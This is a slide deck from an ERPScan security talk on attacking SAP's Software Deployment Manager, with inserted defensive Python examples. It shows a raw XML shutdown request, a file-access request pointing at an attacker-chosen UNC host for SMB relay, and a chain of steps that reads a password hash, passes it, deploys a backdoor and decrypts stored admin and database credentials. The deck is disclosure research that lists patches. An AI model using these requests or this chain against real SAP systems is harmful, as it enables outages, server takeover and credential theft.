SAP SDM Hacking

Uploaded by erpscan, 16-Feb-2017

Page 1: SAP SDM Hacking

Invest in security to secure investments

Injecting evil code in your SAP J2EE systems: Security of SAP Software Deployment Server

Dmitry Chastukhin, Director of SAP pentest/research team

Page 2: SAP SDM Hacking

About ERPScan

• The only 360-degree SAP security solution: ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 awards and nominations
• Research team: 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)

Page 3: SAP SDM Hacking

SAP popularity

• The most popular business application
• More than 248,500 customers in 188 countries
• More than 70% of Forbes 500 run SAP

Page 4: SAP SDM Hacking

SAP insecurity

Espionage
• Stealing financial information
• Stealing corporate secrets
• Stealing supplier and customer lists
• Stealing HR data

Fraud
• False transactions
• Modification of master data

Sabotage
• Denial of service
• Modification of financial reports
• Access to technology network (SCADA) by trust relations

Page 5: SAP SDM Hacking

SAP hacking talks

[Chart: number of SAP hacking talks per year, 2003 to 2013; y-axis 0 to 35]

• BlackHat
• Defcon
• HITB
• RSA
• CONFidence
• DeepSec
• Hacktivity
• Troopers
• Source

Source: SAP Security in Figures

Page 6: SAP SDM Hacking

SAP vulnerabilities

More than 2700 in total

Source: SAP Security in Figures

Page 7: SAP SDM Hacking

Is it remotely exploitable?

> 5000 non-web SAP services exposed in the world, including Dispatcher, Message Server, SAP Host Control, etc.

sapscan.com

Page 8: SAP SDM Hacking

What about other services?

[Chart: y-axis 0 to 9; categories: SAP Dispatcher, SAP MMC, SAP Message Server, SAP HostControl, SAP ITS Agate, SAP Message Server httpd]

Source: SAP Security in Figures

Page 9: SAP SDM Hacking

SAP NetWeaver development infrastructure

• Design Time Repository (DTR)
• Component Build Service (CBS)
• Change Management Service (CMS)
• Software Landscape Directory (SLD) / NS
• Software Deployment Manager (SDM)

Page 10: SAP SDM Hacking

SAP NetWeaver development infrastructure (diagram)

Page 11: SAP SDM Hacking

SAP NetWeaver development infrastructure (diagram)

Page 12: SAP SDM Hacking

SAP NetWeaver development infrastructure (diagram)

Page 13: SAP SDM Hacking

SAP NetWeaver development infrastructure (diagram)

Page 14: SAP SDM Hacking

SAP NetWeaver development infrastructure (diagram)

Page 15: SAP SDM Hacking

SAP NetWeaver development infrastructure (diagram)

Page 16: SAP SDM Hacking

Software Deployment Manager

• Single interface for the deployment
• Deploy apps (*.ear, *.war, *.sda)
• Implement custom patches

Page 17: SAP SDM Hacking

SDM server

• Different server modes
  – standalone
  – integrated
• Only one user at a time
• Only hardcoded admin user
• Two ports:
  – 50117 – Admin Port
  – 50118 – GUI Port

Page 18: SAP SDM Hacking

SDM client

• Browsing the distribution of deployed components
• Deploying and undeploying
• Log viewing

Page 19: SAP SDM Hacking

SDM attack intro

• SAP infrastructure includes many Java services
• Almost all Java stuff uses UME
• Universal user with a password
• Only one user at a time
• Ability to deploy evil code => plus, see 1st item

Page 20: SAP SDM Hacking

SDM attack intro

• Thick client Java application (sad story)
• Scarce communication settings
• Difficult to intercept
• Custom protocols

Page 21: SAP SDM Hacking

SDM attack intro

• SAP has its own SAP Java Virtual Machine (JVM)
• Java 6 has Attach API
• Attach to another running JVM
• Intercept and modify calls

Page 22: SAP SDM Hacking

Attack SAP SDM. DoS

• If an attacker uses an incorrect password 3 times, the server will shut down automatically

• Also, if you send this request, you can shut down the SDM server manually:

[10 spaces]56<?xml version="1.0"?> <ShutDownRequest></ShutDownRequest>

Page 23: SAP SDM Hacking

Attacking SAP SDM. SMB relay

Packet:

[10 spaces]<?xml version="1.0"?> <FileAccessRequest f="\\ip_addr\blabla"> </FileAccessRequest>

An old trick, but sometimes it's very useful
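Detection logic for the two admin-port requests shown on the DoS and SMB relay slides, as an added example (not the presentation's or SAP's code): it parses the padded, length-prefixed XML framing the captures show and flags a ShutDownRequest, or a FileAccessRequest whose f attribute is a UNC path, since the latter makes the SDM server open an outbound SMB connection to a host the requester chose. The framing regex and the sample capture are assumptions constructed for this example.

```python
import re
import xml.etree.ElementTree as ET

# Message shape as shown on the DoS and SMB-relay slides: leading padding, an optional
# decimal length field, then an XML document. Treating that as the general framing of
# the admin-port protocol is an assumption made for this example.
FRAME_RE = re.compile(rb"^\s*(\d+)?\s*(<\?xml.*)$", re.DOTALL)

def parse_sdm_message(raw: bytes):
    """Return (declared_length, root_element) for one captured admin-port message."""
    match = FRAME_RE.match(raw)
    if not match:
        raise ValueError("not an SDM XML message")
    declared = int(match.group(1)) if match.group(1) else None
    root = ET.fromstring(match.group(2).strip())
    return declared, root

def classify_sdm_message(raw: bytes) -> str:
    """Label one message: 'shutdown', 'unc-file-access' (f attribute is a UNC path,
    so the server would connect out to that host over SMB) or 'benign'."""
    _, root = parse_sdm_message(raw)
    if root.tag == "ShutDownRequest":
        return "shutdown"
    if root.tag == "FileAccessRequest" and root.get("f", "").startswith("\\\\"):
        return "unc-file-access"
    return "benign"

def alerts_for(capture: list) -> list:
    """Run the classifier over (source, payload) pairs; keep only the ones worth alerting on."""
    alerts = []
    for src, payload in capture:
        label = classify_sdm_message(payload)
        if label != "benign":
            alerts.append((src, label))
    return alerts

# Constructed sample capture (not from the talk's demo): three requests seen on port 50117.
CAPTURE = [
    ("10.1.2.3", b'          56<?xml version="1.0"?><ShutDownRequest></ShutDownRequest>'),
    ("10.1.2.3", b'          <?xml version="1.0"?><FileAccessRequest f="\\\\10.9.9.9\\share"></FileAccessRequest>'),
    ("10.1.2.4", b'          <?xml version="1.0"?><FileAccessRequest f="C:\\usr\\sap\\deploy.log"></FileAccessRequest>'),
]

if __name__ == "__main__":
    for src, label in alerts_for(CAPTURE):
        print(f"ALERT {label} from {src}")
```

A local file path in FileAccessRequest is left as benign here; only the UNC form and the shutdown request trigger an alert.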

Page 24: SAP SDM Hacking

Prevention

• Install Note 1724516
• Enable the security features of SDM
• SDM server and SDM client need to be updated

https://websmp205.sap-ag.de/~sapidb/012006153200000493902012E/SDM_EnablingSecurity.pdf

Page 25: SAP SDM Hacking

From Nobody to Administrator

Now, I will show an interesting attack

Compromise some SAP services

Compromise SAP SDM

Compromise SAP server OS

Compromise SAP

Page 26: SAP SDM Hacking

SDM authentication abuse

• OK. Let's see how authentication in SDM works:
  – user enters password
  – hash is calculated locally on client
  – password hash is sent to server
  – hash is compared to hash from config file

• Looks like a plain text password

Pass the hash attack here!

Page 27: SAP SDM Hacking

SDM authentication abuse

RootFrame.class (screenshot)

Page 28: SAP SDM Hacking

SDM authentication abuse

…\SDM\program\config\sdmrepository.sdc (screenshot)

Page 29: SAP SDM Hacking

SDM authentication abuse

SMDAuthenticatorImpl.class (screenshot)

Page 30: SAP SDM Hacking

Attack on SAP SDM

Read sdmrepository.sdc

Get hash password

Use hash as password to authenticate on SDM server

Deploy backdoor on SAP server

PROFIT!

Page 31: SAP SDM Hacking

File read

• OS command execution through CTC (Notes 1467771, 1445998)
• XML External Entities (Note 1619539)
• Directory Traversal (Note 1630293)
• Through MMC file read function (Notes 927637 and 1439348)

We have something new for u :)

Page 32: SAP SDM Hacking

SAP Log Viewer standalone

• Open ports: 26000 (NI), 1099 (RMI), 5465 (Socket)
• You can:
  – View log on local server
  – View log on remote server
  – Register file as log file

Read log file without authentication!

Page 33: SAP SDM Hacking

SAP Log Viewer standalone

Attack is pretty easy

Connect to LogViewer standalone server

Register sdmrepository.sdc file as log file

Read it

Page 34: SAP SDM Hacking

SAP Log Viewer standalone (screenshot)

Page 35: SAP SDM Hacking

SAP Log Viewer standalone

When we have a password hash, we can use it as a password to authenticate on the SDM server

Page 36: SAP SDM Hacking

SDM intrusion

Full info about the SDM repository

Page 37: SAP SDM Hacking

Bypassing SDM restrictions

• Observe all server directories
• Read arbitrary files via Log Viewer

Page 38: SAP SDM Hacking

SDM undeploying

Undeploy any application

Page 39: SAP SDM Hacking

SDM backdooring

Deploy any application

Page 40: SAP SDM Hacking

SDM backdooring

• before (screenshot)

• after (screenshot)

Page 41: SAP SDM Hacking

SDM post-exploitation (screenshot)

Page 42: SAP SDM Hacking

Prevention

• Install Notes 1724516, 1685106
• Enable the security features of SDM
• SDM server and SDM client need to be updated

https://websmp205.sap-ag.de/~sapidb/012006153200000493902012E/SDM_EnablingSecurity.pdf

Page 43: SAP SDM Hacking

“The Software Deployment Manager (SDM) uses the database connection information, the J2EE Engine administrator user and password from the secure storage in the file system, to connect to the J2EE Engine and perform tasks such as software deployment and undeployment.”

http://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/2e104202795e33e10000000a155106/content.htm

Wow! J2EE Engine administrator user and password

Where is all this stuff located?

SAP SecStore

Page 44: SAP SDM Hacking

SAP SecStore

“By default, the J2EE Engine stores secure data in the file \usr\sap\<SID>\SYS\global\security\data\SecStore.properties in the file system.”

“The J2EE Engine uses the SAP Java Cryptography Toolkit to encrypt the contents of the secure store with the tripleDES algorithm.”

http://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/2e104202795e33e10000000a155106/content.htm

OK. Let's try to read SecStore.properties

Page 45: SAP SDM Hacking

SAP SecStore

• We can execute any OS command (we have our backdoor)
• We know the SAP J2EE Engine stores the database user SAP<SID>DB; its password is here:
  \usr\sap\<SID>\SYS\global\security\data\SecStore.properties
• It's all that we need

Page 46: SAP SDM Hacking

SecStore.properties

$internal/version=Ni4zFF4wMSeaseforCCMxegAfx
admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS
admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh
jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH
admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ
$internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt
$internal/mode=encrypted
admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E

But where is the key?

Page 47: SAP SDM Hacking

Get the password

• We have an encrypted password
• We have a key to decrypt it

We got the J2EE admin and JDBC login:password!

Page 48: SAP SDM Hacking

Prevention

Restrict read access to the files SecStore.properties and SecStore.key

http://help.sap.com/saphelp_nw73ehp1/helpdata/en/cd/14c93ec2f7df6ae10000000a114084/content.htm
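One way to turn the prevention advice on this slide into a repeatable check, as an added example rather than SAP's own tooling: a small audit that parses a SecStore.properties file, confirms it is in encrypted mode, and flags it or the companion SecStore.key when either is readable by group or others. The store contents, the key file contents and the temp-directory layout are constructed for this example; a real store lives under \usr\sap\<SID>\SYS\global\security\data as the earlier slide states.

```python
import os
import stat
import tempfile

# Constructed stand-in for a SecStore.properties file (layout follows the slide; the
# values are not real ciphertext). "XYZ" plays the role of the <SID> suffix.
SAMPLE_PROPERTIES = """$internal/version=0
$internal/mode=encrypted
$internal/check=CONSTRUCTED
admin/user/XYZ=CONSTRUCTED-CIPHERTEXT
admin/password/XYZ=CONSTRUCTED-CIPHERTEXT
jdbc/pool/XYZ=CONSTRUCTED-CIPHERTEXT
"""

def parse_secstore(text: str) -> dict:
    """Parse key=value lines; blank lines and # comments are skipped."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            key, sep, value = line.partition("=")
            if sep:
                entries[key.strip()] = value.strip()
    return entries

def audit_secstore(props_path: str, key_path: str) -> list:
    """Return findings for the two files; an empty list means both checks pass."""
    findings = []
    for label, path in (("SecStore.properties", props_path), ("SecStore.key", key_path)):
        mode = stat.S_IMODE(os.stat(path).st_mode)
        if mode & (stat.S_IRGRP | stat.S_IROTH):      # anyone but the owner can read it
            findings.append(f"{label} readable by group/other (mode {mode:o})")
    with open(props_path, encoding="utf-8") as fh:
        entries = parse_secstore(fh.read())
    if entries.get("$internal/mode") != "encrypted":
        findings.append("secure store is not in encrypted mode")
    if not any(k.startswith("admin/password/") for k in entries):
        findings.append("no admin/password entry found; unexpected store layout")
    return findings

def demo(mode: int = 0o644) -> list:
    """Write the constructed pair into a temp dir with the given mode and audit it."""
    tmp = tempfile.mkdtemp()
    props, key = os.path.join(tmp, "SecStore.properties"), os.path.join(tmp, "SecStore.key")
    with open(props, "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_PROPERTIES)
    with open(key, "w", encoding="utf-8") as fh:
        fh.write("CONSTRUCTED-KEY-MATERIAL\n")
    for path in (props, key):
        os.chmod(path, mode)
    return audit_secstore(props, key)

if __name__ == "__main__":
    print(demo(0o644) or "no findings")
```

The permission check uses POSIX mode bits, so on Windows the NTFS ACL on those files is what to review instead.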

Page 49: SAP SDM Hacking

Post-exploitation

Page 50: SAP SDM Hacking

SDM hacking demo

Page 51: SAP SDM Hacking

Conclusion

It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep customers secure

SAP Guides

It's all in your hands:
• Regular security assessments
• ABAP code review
• Monitoring technical security
• Segregation of Duties
• Security events monitoring

Page 52: SAP SDM Hacking

Future work

I'd like to thank SAP's Product Security Response Team for the great cooperation to make SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations:

• October 30-31 RSA Europe (Amsterdam, NL)
• November 7-8 ZeroNights (Moscow, Russia)
• November 10 G0S (New Delhi, India)

Page 53: SAP SDM Hacking

Web: www.erpscan.com
e-mail: [email protected]
Twitter: @erpscan @_chipik